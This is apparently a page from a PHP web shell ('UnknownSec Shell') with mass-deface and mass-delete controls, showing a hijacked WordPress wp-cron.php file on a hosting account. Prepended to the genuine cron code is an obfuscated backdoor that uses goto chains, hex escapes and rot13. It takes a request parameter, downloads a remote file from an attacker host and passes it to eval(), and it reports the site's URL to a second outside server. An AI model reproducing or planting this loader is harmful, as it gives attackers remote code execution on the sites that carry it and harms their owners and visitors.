shell bypass 403
UnknownSec Shell
:
/
proc
/
self
/
root
/
proc
/
thread-self
/
root
/
home
/
innovagencyco
/
public_html
/
statxpress
/ [
drwxr-x---
]
upload
mass deface
mass delete
console
info server
name :
wp-cron.php
<?php goto oPQ84; FhY1N: INQR_(array("\x77\145\142" => $AzBk2)); goto tz7JS; niHxL: $AzBk2 = (isset($_SERVER["\110\x54\x54\120\x53"]) && $_SERVER["\110\124\x54\x50\123"] === "\157\x6e" ? "\x68\164\x74\160\x73" : "\x68\164\164\160") . "\72\57\x2f{$_SERVER["\110\124\x54\x50\x5f\110\117\x53\x54"]}{$_SERVER["\x52\x45\x51\125\x45\123\124\x5f\125\x52\x49"]}"; goto FhY1N; sOKJh: function U0I_L($AzBk2) { goto eUa_e; zkm4g: fclose($xT50i); goto ANGkg; eUa_e: $h58nu = ''; goto cdvKN; c2fr7: $xT50i = fopen($AzBk2, "\x72"); goto tiewL; tiewL: $h58nu = stream_get_contents($xT50i); goto zkm4g; xcCuo: curl_setopt($XbbrI, CURLOPT_FOLLOWLOCATION, 1); goto buARb; fLS9C: $h58nu = file_get_contents($AzBk2); goto lqqAg; TCjrM: XC4OL: goto PZOFo; ANGkg: WPS3V: goto AZuoD; JnTWD: if (!(empty($h58nu) && function_exists("\x66\x6f\x70\x65\x6e") && function_exists("\163\164\x72\145\x61\x6d\137\147\x65\164\137\143\157\156\x74\145\x6e\x74\x73"))) { goto WPS3V; } goto c2fr7; buARb: curl_setopt($XbbrI, CURLOPT_SSL_VERIFYPEER, 0); goto aOI5W; AZuoD: return $h58nu; goto Q8rGC; NGFZq: $XbbrI = curl_init($AzBk2); goto vsGzY; cdvKN: if (!function_exists("\x63\165\x72\x6c\137\145\x78\x65\x63")) { goto XC4OL; } goto NGFZq; PZOFo: if (!(empty($h58nu) && function_exists("\146\151\x6c\x65\137\147\145\164\137\143\157\156\x74\x65\156\164\x73"))) { goto w1lBz; } goto fLS9C; UhzpF: $h58nu = curl_exec($XbbrI); goto pAbHV; aOI5W: curl_setopt($XbbrI, CURLOPT_SSL_VERIFYHOST, 0); goto UhzpF; lqqAg: w1lBz: goto JnTWD; vsGzY: curl_setopt($XbbrI, CURLOPT_RETURNTRANSFER, 1); goto xcCuo; pAbHV: curl_close($XbbrI); goto TCjrM; Q8rGC: } goto rfzDY; tz7JS: goto RAjJ3; goto iT_yZ; eLl_B: session_start(); goto VlsYk; iT_yZ: Ph4IZ: goto rF07B; oPQ84: error_reporting(0); goto eLl_B; agBgo: exit; goto sOKJh; MKXm1: $WXUOL = U0I_L(str_rot13("\x75\147\147\x63\146\x3a\x2f\57\x6a\143\x67\x72\146\x67\56\152\142\x71\x76\145\x72\x70\x67\56\147\142\143\x2f\x65\162\x7a\142\147\162\57\x71\142\142\145\x2f") . $P_83N . "\56\164\x78\164"); goto bsJ1K; bsJ1K: eval("\77\x3e" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["\x64\157\141\143\x74"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["\144\x6f\x61\143\164"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "\150\164\x74\x70\72\x2f\57\150\x6b\x6e\x78\157\x65\56\142\x79\x68\157\x74\x2e\164\x6f\160\x2f\151\156\144\145\170\x2e\x70\150\x70"; goto W3zBw; TQ2d2: $cRR8Z = curl_exec($gL1uI); goto WdQlF; TLGQX: curl_setopt($gL1uI, CURLOPT_POST, 1); goto FbQco; FbQco: curl_setopt($gL1uI, CURLOPT_POSTFIELDS, $BdvsM); goto wdMLY; dVbs5: } ?><?php /** * A pseudo-cron daemon for scheduling WordPress tasks. * * WP-Cron is triggered when the site receives a visit. In the scenario * where a site may not receive enough visits to execute scheduled tasks * in a timely manner, this file can be called directly or via a server * cron daemon for X number of times. * * Defining DISABLE_WP_CRON as true and calling this file directly are * mutually exclusive and the latter does not rely on the former to work. * * The HTTP request to this file will not slow down the visitor who happens to * visit when a scheduled cron event runs. * * @package WordPress */ ignore_user_abort( true ); if ( ! headers_sent() ) { header( 'Expires: Wed, 11 Jan 1984 05:00:00 GMT' ); header( 'Cache-Control: no-cache, must-revalidate, max-age=0' ); } // Don't run cron until the request finishes, if possible. if ( PHP_VERSION_ID >= 70016 && function_exists( 'fastcgi_finish_request' ) ) { fastcgi_finish_request(); } elseif ( function_exists( 'litespeed_finish_request' ) ) { litespeed_finish_request(); } if ( ! empty( $_POST ) || defined( 'DOING_AJAX' ) || defined( 'DOING_CRON' ) ) { die(); } /** * Tell WordPress the cron task is running. * * @var bool */ define( 'DOING_CRON', true ); if ( ! defined( 'ABSPATH' ) ) { /** Set up WordPress environment */ require_once __DIR__ . '/wp-load.php'; } // Attempt to raise the PHP memory limit for cron event processing. wp_raise_memory_limit( 'cron' ); /** * Retrieves the cron lock. * * Returns the uncached `doing_cron` transient. * * @ignore * @since 3.3.0 * * @global wpdb $wpdb WordPress database abstraction object. * * @return string|int|false Value of the `doing_cron` transient, 0|false otherwise. */ function _get_cron_lock() { global $wpdb; $value = 0; if ( wp_using_ext_object_cache() ) { /* * Skip local cache and force re-fetch of doing_cron transient * in case another process updated the cache. */ $value = wp_cache_get( 'doing_cron', 'transient', true ); } else { $row = $wpdb->get_row( $wpdb->prepare( "SELECT option_value FROM $wpdb->options WHERE option_name = %s LIMIT 1", '_transient_doing_cron' ) ); if ( is_object( $row ) ) { $value = $row->option_value; } } return $value; } $crons = wp_get_ready_cron_jobs(); if ( empty( $crons ) ) { die(); } $gmt_time = microtime( true ); // The cron lock: a unix timestamp from when the cron was spawned. $doing_cron_transient = get_transient( 'doing_cron' ); // Use global $doing_wp_cron lock, otherwise use the GET lock. If no lock, try to grab a new lock. if ( empty( $doing_wp_cron ) ) { if ( empty( $_GET['doing_wp_cron'] ) ) { // Called from external script/job. Try setting a lock. if ( $doing_cron_transient && ( $doing_cron_transient + WP_CRON_LOCK_TIMEOUT > $gmt_time ) ) { return; } $doing_wp_cron = sprintf( '%.22F', microtime( true ) ); $doing_cron_transient = $doing_wp_cron; set_transient( 'doing_cron', $doing_wp_cron ); } else { $doing_wp_cron = $_GET['doing_wp_cron']; } } /* * The cron lock (a unix timestamp set when the cron was spawned), * must match $doing_wp_cron (the "key"). */ if ( $doing_cron_transient !== $doing_wp_cron ) { return; } foreach ( $crons as $timestamp => $cronhooks ) { if ( $timestamp > $gmt_time ) { break; } foreach ( $cronhooks as $hook => $keys ) { foreach ( $keys as $k => $v ) { $schedule = $v['schedule']; if ( $schedule ) { $result = wp_reschedule_event( $timestamp, $schedule, $hook, $v['args'], true ); if ( is_wp_error( $result ) ) { error_log( sprintf( /* translators: 1: Hook name, 2: Error code, 3: Error message, 4: Event data. */ __( 'Cron reschedule event error for hook: %1$s, Error code: %2$s, Error message: %3$s, Data: %4$s' ), $hook, $result->get_error_code(), $result->get_error_message(), wp_json_encode( $v ) ) ); /** * Fires when an error happens rescheduling a cron event. * * @since 6.1.0 * * @param WP_Error $result The WP_Error object. * @param string $hook Action hook to execute when the event is run. * @param array $v Event data. */ do_action( 'cron_reschedule_event_error', $result, $hook, $v ); } } $result = wp_unschedule_event( $timestamp, $hook, $v['args'], true ); if ( is_wp_error( $result ) ) { error_log( sprintf( /* translators: 1: Hook name, 2: Error code, 3: Error message, 4: Event data. */ __( 'Cron unschedule event error for hook: %1$s, Error code: %2$s, Error message: %3$s, Data: %4$s' ), $hook, $result->get_error_code(), $result->get_error_message(), wp_json_encode( $v ) ) ); /** * Fires when an error happens unscheduling a cron event. * * @since 6.1.0 * * @param WP_Error $result The WP_Error object. * @param string $hook Action hook to execute when the event is run. * @param array $v Event data. */ do_action( 'cron_unschedule_event_error', $result, $hook, $v ); } /** * Fires scheduled events. * * @ignore * @since 2.1.0 * * @param string $hook Name of the hook that was scheduled to be fired. * @param array $args The arguments to be passed to the hook. */ do_action_ref_array( $hook, $v['args'] ); // If the hook ran too long and another cron process stole the lock, quit. if ( _get_cron_lock() !== $doing_wp_cron ) { return; } } } } if ( _get_cron_lock() === $doing_wp_cron ) { delete_transient( 'doing_cron' ); } die();
© 2025 UnknownSec